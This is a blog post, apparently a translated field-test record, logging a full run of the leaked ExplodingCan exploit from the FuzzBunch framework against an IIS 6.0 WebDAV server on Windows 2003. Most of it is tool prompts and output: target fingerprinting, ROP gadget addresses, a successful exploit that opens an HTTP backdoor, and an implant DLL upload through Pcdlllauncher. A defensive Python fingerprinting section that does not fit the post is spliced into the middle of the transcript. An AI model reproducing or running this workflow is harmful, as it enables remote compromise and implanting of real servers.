
NSA Equation Group tool field test (explodingcan)

August 23, 2017

The detailed method has already been written up, so it is not explained again here; this post is only a record of the process. For the details see http://www.am0s.com/penetration/381.html. As before, the places where input is required were marked in red bold; everything else can be left at its default.

[?] Default Target IP Address [] : x.x.x.x
[?] Default Callback IP Address [] : x.x.x.x
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : c:\12
[*] Checking c:\12 for projects
Index Project
----- -------
0 w
1 Create a New Project

[?] Project [0] : 0
[?] Set target log directory to 'c:\12\w\zx.x.x.x'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => x.x.x.x
[+] Set CallbackIp => x.x.x.x

[!] Redirection OFF
[+] Set LogDir => c:\12\w\zx.x.x.x
[+] Set Project => w

fb > use exp
Explodingcan Explodingcantouch
fb > use Explodingcan

[!] Entering Plugin Context :: Explodingcan
[*] Applying Global Variables
[+] Set TargetIp => x.x.x.x
[+] Set NetworkTimeout => 60

[*] Applying Session Parameters
[*] Running Exploit Touches

[!] Entering Plugin Context :: Iistouch
[*] Applying Global Variables
[+] Set TargetIp => x.x.x.x
[+] Set NetworkTimeout => 60

[*] Inheriting Input Variables
[+] Set TargetIp => x.x.x.x
[+] Set EnableSSL => False
[+] Set TargetPort => 80
[+] Set NetworkTimeout => 60

[!] Enter Prompt Mode :: Iistouch

[*] TargetIp :: Target IP Address

[?] TargetIp [x.x.x.x] :

[*] TargetPort :: Port used by the HTTP service

[?] TargetPort [80] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] EnableSSL :: Enable SSL for HTTPS targets

[?] EnableSSL [False] :

[*] hostString :: String to use in HTTP request

[?] hostString [localhost] :
[!] Preparing to Execute Iistouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [x.x.x.x] :
[?] Destination Port [80] :
[+] (TCP) Local x.x.x.x:80

[+] Configure Plugin Remote Tunnels
Module: Iistouch
================

Name Value
---- -----
TargetIp x.x.x.x
TargetPort 80
NetworkTimeout 60
EnableSSL False
hostString localhost

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Initializing Parameters
[*] Gathering Parameters
[+] Sending HTTP Options Request
[+] Initializing network
[+] Creating Launch Socket
[+] Target is x.x.x.x:80
[-] Socket Recv Failed!
[-] HTTP request failed
[-] Options Request Failed!
[!] Plugin failed
[-] Error: Iistouch Failed
fb Exploit (Explodingcan) > use Explodingcan

[!] Entering Plugin Context :: Explodingcan
[*] Applying Global Variables
[+] Set TargetIp => x.x.x.x
[+] Set NetworkTimeout => 60

[*] Applying Session Parameters
[*] Running Exploit Touches

[!] Entering Plugin Context :: Iistouch
[*] Applying Global Variables
[+] Set TargetIp => x.x.x.x
[+] Set NetworkTimeout => 60

[*] Inheriting Input Variables
[+] Set TargetIp => x.x.x.x
[+] Set EnableSSL => False
[+] Set TargetPort => 80
[+] Set NetworkTimeout => 60

[!] Enter Prompt Mode :: Iistouch

[*] TargetIp :: Target IP Address

[?] TargetIp [x.x.x.x] :

[*] TargetPort :: Port used by the HTTP service

[?] TargetPort [80] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] EnableSSL :: Enable SSL for HTTPS targets

[?] EnableSSL [False] :

[*] hostString :: String to use in HTTP request

[?] hostString [localhost] :
[!] Preparing to Execute Iistouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [x.x.x.x] :
[?] Destination Port [80] :
[+] (TCP) Local x.x.x.x:80

[+] Configure Plugin Remote Tunnels
Module: Iistouch
================

Name Value
---- -----
TargetIp x.x.x.x
TargetPort 80
NetworkTimeout 60
EnableSSL False
hostString localhost

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Initializing Parameters
[*] Gathering Parameters
[+] Sending HTTP Options Request
[+] Initializing network
[+] Creating Launch Socket
[+] Target is x.x.x.x:80
[+] Sending HTTP Head Request
[+] Initializing network
[+] Creating Launch Socket
[+] Target is x.x.x.x:80
[*] Finding IIS Version
[+] Checking server response for IIS version
[+] Found IIS version 6.0
[+] Windows 2003
[*] Detecting WEBDAV
[+] Checking server response for Webdav
[+] SEARCH Option found. Webdav is enabled.
[+] PROPFIND Option found. Webdav is enabled.
[*] Writing Contract
[+] IIS Version: 6.0
[+] IIS Target OS: WIN2K3
[+] Target Language: Unknown
[+] Target Service Pack: Unknown
[+] Target Path: /
[+] Enable SSL: FALSE
[+] WebDAV is ENABLED
[*] IIS Touch Complete
[+] Iistouch Succeeded

[*] Exporting Contract To Exploit
[!] Explodingcan requires WEBDAV on Windows 2003 IIS 6.0
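The Iistouch stage above decides from the OPTIONS and HEAD responses whether the host is IIS 6.0 on Windows 2003 with WebDAV enabled, which is the only configuration this exploit accepts. The following is an added example, not code from the original post or from the FuzzBunch tooling: it evaluates a captured response head the same way, so a defender can inventory servers that still match that precondition and remove WebDAV or retire the host. The three response texts are constructed samples; the WebDAV rule mirrors the transcript (SEARCH or PROPFIND advertised means enabled), and the version-to-OS table goes beyond the page, which only shows 6.0 mapping to WIN2K3.

```python
# Added example (not part of the original post or of Iistouch): classify an
# HTTP OPTIONS/HEAD response head by IIS version, Windows generation and
# advertised WebDAV methods. All sample responses below are constructed.
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: IIS 6.0 advertising the full WebDAV verb set.
SAMPLE_IIS6_WEBDAV = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "DAV: 1, 2\r\n"
    "Content-Length: 0\r\n\r\n"
)
# Constructed sample: same IIS version with WebDAV disabled (no DAV verbs).
SAMPLE_IIS6_NO_WEBDAV = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Content-Length: 0\r\n\r\n"
)
# Constructed sample: a newer IIS that fails the version check even with WebDAV on.
SAMPLE_IIS75_WEBDAV = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, LOCK, UNLOCK\r\n"
    "Content-Length: 0\r\n\r\n"
)

# IIS version -> Windows generation. The transcript only shows 6.0 -> WIN2K3;
# the other rows are the well-known pairings (an addition beyond the page).
IIS_TO_OS = {"5.0": "WIN2K", "5.1": "WINXP", "6.0": "WIN2K3", "7.0": "WIN2K8", "7.5": "WIN2K8R2"}
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
# The touch output reports "Webdav is enabled" on seeing either of these.
WEBDAV_INDICATORS = {"SEARCH", "PROPFIND"}


@dataclass
class TouchResult:
    iis_version: Optional[str]
    target_os: Optional[str]
    webdav_methods: List[str] = field(default_factory=list)
    webdav_enabled: bool = False
    matches_precondition: bool = False  # IIS 6.0 on Windows 2003 with WebDAV enabled


def parse_headers(raw: str) -> Dict[str, str]:
    """Parse a raw response head into a lower-cased header dict.

    Repeated headers are merged with ", " so Allow/Public lists stay complete.
    """
    headers: Dict[str, str] = {}
    head = raw.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        key, value = name.strip().lower(), value.strip()
        headers[key] = f"{headers[key]}, {value}" if key in headers else value
    return headers


def iis_version(headers: Dict[str, str]) -> Optional[str]:
    """Return the version from 'Server: Microsoft-IIS/x.y', or None for other servers."""
    server = headers.get("server", "")
    prefix = "microsoft-iis/"
    if not server.lower().startswith(prefix):
        return None
    return server[len(prefix):].split()[0]


def advertised_methods(headers: Dict[str, str]) -> List[str]:
    """Collect the method tokens advertised in the Allow and Public headers."""
    tokens = set()
    for name in ("allow", "public"):
        for token in headers.get(name, "").split(","):
            token = token.strip().upper()
            if token:
                tokens.add(token)
    return sorted(tokens)


def touch(raw_response: str) -> TouchResult:
    """Evaluate one OPTIONS/HEAD response head against the Iistouch-style checks."""
    headers = parse_headers(raw_response)
    version = iis_version(headers)
    dav = [m for m in advertised_methods(headers) if m in WEBDAV_METHODS]
    enabled = any(m in WEBDAV_INDICATORS for m in dav)
    return TouchResult(
        iis_version=version,
        target_os=IIS_TO_OS.get(version) if version else None,
        webdav_methods=dav,
        webdav_enabled=enabled,
        matches_precondition=(version == "6.0" and enabled),
    )


if __name__ == "__main__":
    for label, sample in (("iis6+webdav", SAMPLE_IIS6_WEBDAV),
                          ("iis6 no webdav", SAMPLE_IIS6_NO_WEBDAV),
                          ("iis7.5+webdav", SAMPLE_IIS75_WEBDAV)):
        print(label, touch(sample))
```

Feed `touch()` the response head saved from your own inventory scan of a host; a result with `matches_precondition` set means the server advertises exactly what the transcript's touch looks for and should be treated as exposed until WebDAV is disabled or the host is decommissioned.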

[!] Entering Plugin Context :: Explodingcantouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => x.x.x.x

[*] Inheriting Input Variables
[+] Set TargetIp => x.x.x.x
[+] Set TargetPort => 80
[+] Set NetworkTimeout => 60

[!] Enter Prompt Mode :: Explodingcantouch

[*] hostString :: String to use in HTTP request

[?] hostString [localhost] :

[*] maxSizeToCheck :: Use 130 to ensure path size determination, less to send fewer requests. 70 will cover all exploitable sizes.

[?] maxSizeToCheck [70] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] EnableSSL :: Enable SSL for HTTPS targets

[?] EnableSSL [False] :

[*] TargetIp :: Target IP Address

[?] TargetIp [x.x.x.x] :

[*] TargetPort :: Port used by the HTTP service

[?] TargetPort [80] :

[*] Delay :: Number of seconds to wait between each request

[?] Delay [0] :
[!] Preparing to Execute Explodingcantouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [x.x.x.x] :

[?] Destination Port [80] :
[+] (TCP) Local x.x.x.x:80

[+] Configure Plugin Remote Tunnels
Module: Explodingcantouch
=========================

Name Value
---- -----
hostString localhost
maxSizeToCheck 70
NetworkTimeout 60
EnableSSL False
TargetIp x.x.x.x
TargetPort 80
Delay 0

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Initializing Parameters
[*] Gathering Parameters
[*] Finding Path Size
[+]Checking path sizes from 3 to 70
[+]No delay set.
[+]The expected HTTP 500 response was returned
[+] Found IIS Path Size 9
[*] Writing Contract
[+] IIS Path Size: 9
[+] Request string: localhost
[+] Enable SSL: FALSE
[*] ExplodingCan Touch Complete
[+] Explodingcantouch Succeeded

[*] Exporting Contract To Exploit
[+] Set IISPathSize => 9
[+] Set hostString => localhost
[!] ExplodingCan requires the length of the IIS path
[!] Enter Prompt Mode :: Explodingcan

Module: Explodingcan
====================

Name Value
---- -----
TargetIp x.x.x.x
TargetPort 80
NetworkTimeout 60
EnableSSL False
IISPathSize 9
hostString localhost
PayloadAccessType
AuthenticationType None
Target

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*] TargetIp :: Target IP Address

[?] TargetIp [x.x.x.x] :

[*] TargetPort :: Port of the HTTP service

[?] TargetPort [80] :

[*] NetworkTimeout :: Network timeout (in seconds)

[?] NetworkTimeout [60] :

[*] EnableSSL :: Enable SSL for HTTPS targets

[?] EnableSSL [False] :

[*] IISPathSize :: Length of IIS path (between 3 and 68)

[?] IISPathSize [9] :

[*] hostString :: String to use in HTTP requests

[?] hostString [localhost] :

[*] PayloadAccessType :: Callback/Listen Payload Access

0) Callback Target connect() callback for payload upload connection
1) Listen Target listen()/accept() for payload upload connection
2) Backdoor Target open HTTP backdoor for payload upload connection

[?] PayloadAccessType [] :2

[+] Set PayloadAccessType => Backdoor

[*] BackdoorHeader :: Name of HTTP header used to trigger backdoor.

0) Accept
1) Accept-Charset
2) Accept-Encoding
3) Accept-Language
4) Allow
5) Authorization
6) Cache-Control
7) Content-Encoding
8) Content-Language
9) Content-Location
10) Content-MD5
11) Content-Range
12) Content-Type
13) Cookie
14) Date
15) Expect
16) Expires
17) From
*18) If-Match
19) If-Modified-Since
20) If-None-Match
21) If-Range
22) If-Unmodified-Since
23) Last-Modified
24) Max-Forwards
25) Pragma
26) Proxy-Authorization
27) Range
28) Referer
29) Trailer
30) Translate
31) Upgrade
32) User-Agent
33) Via
34) Warning

[?] BackdoorHeader [18] :

[*] BackdoorValueSource :: Method of generating value for HTTP trigger header.

0) Manual Operator-controlled value.
*1) RandomEtag Randomly generated HTTP Etag string.
2) RandomBasicAuth Randomly generated Basic Auth credential string.

[?] BackdoorValueSource [1] :

[*] AuthenticationType :: Authentication type for target

*0) None No authentication
1) Basic Basic HTTP authentication

[?] AuthenticationType [0] :

[*] Target :: Target OS

0) W2K3SP0 Windows 2003 Base
1) W2K3SP1 Windows 2003 Service Pack 1
2) W2K3SP2 Windows 2003 Service Pack 2
3) W2K3SP0_v5IM Windows 2003 Base (IIS 5.0 Isolation Mode)
4) W2K3SP1_v5IM Windows 2003 Service Pack 1 (IIS 5.0 Isolation Mode)

[?] Target [] : 2
[+] Set Target => W2K3SP2

[*] BackdoorDelay :: How long to wait (in seconds) for trigger responses.

[?] BackdoorDelay [10] :

[*] BackdoorRetries :: Maximum number of times to try triggering the backdoor.

[?] BackdoorRetries [1] :

[*] PccpPy :: Full path to pccp.pyc.

[?] PccpPy [D:\DSZOPSDISK\storage\pccp.pyc] : c:\pccp.pyc
[+] Set PccpPy => c:\pccp.pyc

[*] BackdoorBridgeDLL :: Full path to IIS-backdoor-to-PC-host DLL.

[?] BackdoorBridgeDLL [D:\DSZOPSDISK\storage\brdg.dll] : c:\brdg.dll
[+] Set BackdoorBridgeDLL => c:\brdg.dll

[*] PythonExe :: Full path to Python [2.6] executable.

[?] PythonExe [C:\Python26\python.exe] :
[!] Preparing to Execute Explodingcan
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [x.x.x.x] :
[?] Destination Port [80] :
[+] (TCP) Local x.x.x.x:80

[+] Configure Plugin Remote Tunnels
Module: Explodingcan
====================

Name Value
---- -----
BackdoorIndex 29
BackdoorValue <RANDOM_ETAG>
BackdoorDelay 10
BackdoorRetries 1
PccpPy c:\pccp.pyc
BackdoorBridgeDLL c:\brdg.dll
PythonExe C:\Python26\python.exe
TargetIp x.x.x.x
TargetPort 80
NetworkTimeout 60
EnableSSL False
IISPathSize 9
hostString localhost
buf1size 272
buf2size 3072
SkipFree 33686018
SkipOffset 220
VirtualProtectOffset 284
WriteAddressOffset1 224
WriteAddressOffset2 292
ObjectAddress 256
ObjectAddressOffset1 268
ObjectAddressOffset4 252
ObjectAddressOffset2 232
ObjectAddressOffset3 216
MovEcxEspOffset 252
StackAdjustOffset1 220
StackAdjustOffset2 224
StackAdjustOffset3 312
Push40Offset 268
LeaveRetOffset1 308
LeaveRetOffset2 372
SetEbp1 372
SetEbp1Offset 304
SetEbp2 348
SetEbp2Offset 332
SetEbp3 312
SetEbp3Offset 368
MovEbpOffset 336
ShellcodeAddr 416
ShellcodeAddrOffset 280
ShellcodeOffset 376
JmpEBXOffset 276
ProcHandleOffset 288
VProtSizeOffset 296
LoadEaxOffset 312
EaxValOffset 352
LoadEax2Offset 360
MovEcxEsp 1744920706
WriteAddress 1745031872
StackAdjust 1744858703
Push40 1744875795
LeaveRet 1744906727
MovEbp 1744858629
JmpEBX 1744905443
SyscallAddress 2147353344
VProtSize 1745028206
LoadEax 1744868241
EaxValAddress 1744863814
LoadEax2 1744969130
PayloadAccessType Backdoor
BackdoorHeader If-Match
BackdoorValueSource RandomEtag
AuthenticationType None
Target W2K3SP2

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Running Exploit
[*] Initializing Parameters
[+] BackdoorValue set to random Etag string ("0cf29bcb5d66e7278e2039a595bacb3c")
[+] Initializing Complete
[*] Initializing Network
[+] Creating Launch Socket
[+] Target is x.x.x.x:80
[+] Network initialization complete
[*] Building Exploit Buffer
[+] Set Egg Authcode: 80ae98f4
[+] Set Egg XOR Mask: 4d
[+] Exploit Build Complete
[*] Exploiting Target
[+] Building HTTP Request
[+] No Authentication
[+] Sending Exploit
[+] Sending 5196 (0x0000144c) bytes
[+] SendExploit() send complete
[*] Attemping to trigger IIS backdoor (up to 1 tries)
[+] Backdoor trigger SUCCEEDED; proceeding to auth-code check
[*] Waiting for Authcode from exploit
[+] Authcode check passed : EGG 80ae98f4 : Generated 80ae98f4
[*] Exploit Complete
[+] Explodingcan Succeeded

[!] Connection to Target Established   // connection has been established
[!] Waiting For Next Stage

fb Exploit (Explodingcan) >

fb Exploit (Explodingcan) > use Pcdlllauncher

[!] Entering Plugin Context :: Pcdlllauncher
[*] Applying Global Variables
[+] Set NetworkTimeout => 60

[*] Applying Session Parameters
[+] Set ConnectedTcp => 1900
[+] Set XorMask => 77
[+] Set Rendezvous => 2571

[!] Enter Prompt Mode :: Pcdlllauncher

Module: Pcdlllauncher
=====================

Name Value
---- -----
ConnectedTcp 1900
XorMask 77
NetworkTimeout 60
LPFilename D:\DSZOpsDisk\Resources\Pc\Legacy\PC_Exploit.dll
LPEntryName ServiceEntry
ImplantFilename
TargetOsArchitecture x86
PCBehavior 8
Rendezvous 2571

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*] ConnectedTcp :: Connected TCP Socket

[?] ConnectedTcp [1900] :

[*] XorMask :: XOR Mask for communication

[?] XorMask [77] :

[*] NetworkTimeout :: Network timeout (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] LPFilename :: Full path to LP

[?] LPFilename [D:\DSZOpsDisk\Resources\Pc\Legacy\PC_Exploit.dll] : c:\PC_Exploit.dll
[+] Set LPFilename => c:\PC_Exploit.dll

[*] LPEntryName :: LP Entry Function Name

[?] LPEntryName [ServiceEntry] :

[*] ImplantFilename :: Full path to implant payload

[?] ImplantFilename [] : c:\1234.dll
[+] Set ImplantFilename => c:\1234.dll

[*] Rendezvous :: Rendezvous location

[?] Rendezvous [2571] :

[*] TargetOsArchitecture :: Machine architecture of target.

*0) x86 32-bit Intel x86 processor.
1) x64 64-bit AMD x86_64 processor.

[?] TargetOsArchitecture [0] :

[*] PCBehavior :: PEDDLECHEAP EGG Behavior

0) 7 Re-use Socket (PC EGG behavior is NOT DONE)
*1) 8 Re-use Socket and PC EGG behavior

[?] PCBehavior [1] :
[!] Preparing to Execute Pcdlllauncher

Module: Pcdlllauncher
=====================

Name Value
---- -----
ConnectedTcp 1900
XorMask 77
NetworkTimeout 60
LPFilename c:\PC_Exploit.dll
LPEntryName ServiceEntry
ImplantFilename c:\1234.dll
TargetOsArchitecture x86
PCBehavior 8
Rendezvous 2571

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Initializing Parameters
[*] Preparing Implant
Loaded implant len 5120
[*] Uploading Implant
[+] Payload Size : 6664
[+] Payload XOR Mask: 77
[+] Sending Implant Size To Target
[+] Size: 6664 (0x00001a08)
[+] Checking Remote Status
[+] Remote Status OKAY
[+] Sending Implant To Target
[+] Checking Remote Status
[+] Remote Status OKAY
[*] Launch LP
[+] LoadLibrary on c:\PC_Exploit.dll
[+] GetProcAddress for : ServiceEntry
[+] Calling Entry point
Duplicating socket
**** FAILED TO DUPLICATE SOCKET **** // executed successfully
Duplicating socket
**** FAILED TO DUPLICATE SOCKET ****
